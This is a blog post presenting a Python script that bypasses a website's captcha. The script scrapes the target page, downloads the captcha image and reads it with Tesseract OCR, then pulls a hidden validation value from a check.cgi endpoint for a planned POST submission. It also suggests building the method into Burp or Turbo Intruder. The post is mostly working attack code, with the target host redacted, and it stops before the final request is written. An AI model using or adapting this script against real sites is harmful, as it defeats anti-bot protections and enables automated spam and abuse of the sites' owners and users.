Friday, November 18, 2022

Captcha Bypass Using Tesseract OCR and Python

import cv2
import pytesseract
from urllib.request import urlopen
import numpy as np
from bs4 import BeautifulSoup
import requests
import urllib.parse
import re

#burninator August 2022

#captcha bypass: by hitting the validation check API directly PLUS using OCR AI library to read the captcha

#contact_check_page = requests.get('')

#testRegexTheCode = '/RECAPTCHACODE/RECAPTCHA.png'
#x = re.findall("[0-9]+",testRegexTheCode)

# Browser-like User-Agent sent with the page request below.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0'}

# STEP ONE - get the recaptcha image text value first, before the .cgi check (order matters!)

# Offline alternative for testing: thesoupson = open('TARGET/TARGET.htm', 'r')
# A timeout keeps the script from hanging forever on an unresponsive host.
thesoupofcontact = requests.get('TARGET/', headers=headers, timeout=30) #also tested and working
thesoupson = thesoupofcontact.text

soup = BeautifulSoup(thesoupson, "html.parser")
images = soup.find_all('img')

# Pre-initialise so a page without a captcha image fails with a clear message
# instead of a NameError further down the script.
targetCaptcha = None
fromRecaptchaUrl = None
for image in images:
    # Not every <img> carries a src attribute; treat a missing one as empty.
    src = image.get('src') or ''
    if 'recaptcha.png' not in src:
        continue
    print('target captcha ' + src)
    targetCaptcha = src
    # First run of digits in the image path, or None when the path has no digits.
    recaptchaCodeMatch = re.findall(r"[0-9]+", targetCaptcha)
    fromRecaptchaUrl = recaptchaCodeMatch[0] if recaptchaCodeMatch else None

if targetCaptcha is None:
    raise SystemExit("no <img> with 'recaptcha.png' in its src was found on the page")


# Point pytesseract at the Tesseract binary explicitly instead of relying on
# environment variables / PATH.
pytesseract.pytesseract.tesseract_cmd = r'C:\PROGRA~1\Tesseract-OCR\tesseract.exe'

# Download the captcha image and decode it in memory with OpenCV.
# targetCaptcha is the image path found in STEP ONE; it is appended to the host
# as-is, so it is assumed to start with '/' -- TODO confirm for the target page.
with urlopen('https://TARGET' + targetCaptcha, timeout=30) as req:
    arr = np.asarray(bytearray(req.read()), dtype=np.uint8)

img = cv2.imdecode(arr, cv2.IMREAD_UNCHANGED)
if img is None:
    # imdecode returns None when the bytes are not a decodable image.
    raise SystemExit("downloaded captcha could not be decoded as an image")

# Debug preview (press Esc to abort). Kept disabled as a pair: waitKey is only
# meaningful while an imshow window exists.
#cv2.imshow('lalala', img)
#if cv2.waitKey() & 0xff == 27: quit()

# Local-file alternative for testing:
#img = cv2.imread('recaptcha.png')

# Converting to text
# NOTE(review): the OCR result is used raw; Tesseract output usually carries
# trailing whitespace -- consider stripping it before submitting the answer.
answerToRecaptcha = pytesseract.image_to_string(img)

print("this is the captcha text TEEHEE!" + answerToRecaptcha)

#STEP TWO - get the CGI value - usually loaded from Javascript by the page
#CGI request is tested and working, tho i just added that cgisouprequest var.
# The request reuses the module-level User-Agent headers so it matches the
# page request in STEP ONE, and a timeout so it cannot hang indefinitely.
cgisouprequest = requests.get('https://TARGET/check.cgi', headers=headers, timeout=30)
cgisoup = cgisouprequest.text

# Offline alternative for testing: cgisoup = open('TARGET/contact_check.cgi', 'r')
soupses = BeautifulSoup(cgisoup, "html.parser")
inputs = soupses.find_all('input')

# Keep the value of the last <input> that has one; inputs without a value
# attribute are skipped instead of raising KeyError.
thevalue = None
for field in inputs:
    if field.get('value') is None:
        continue
    thevalue = str(field['value'])
    print(thevalue)

if thevalue is None:
    raise SystemExit("check.cgi response contained no <input> with a value attribute")

# Percent-encode everything (safe="" also encodes '/') so the value can be
# embedded verbatim in a form-encoded request body.
encodeme = urllib.parse.quote(thevalue, safe="")

contactCheckValue = encodeme

#STEP THREE - build out the POST request with the stuff with the two variables + that same randomized User-Agent string

# also consider building this into either a Burp extension or Turbo Intruder (most likely an extension since it allows calling python modules or other treats from the path)

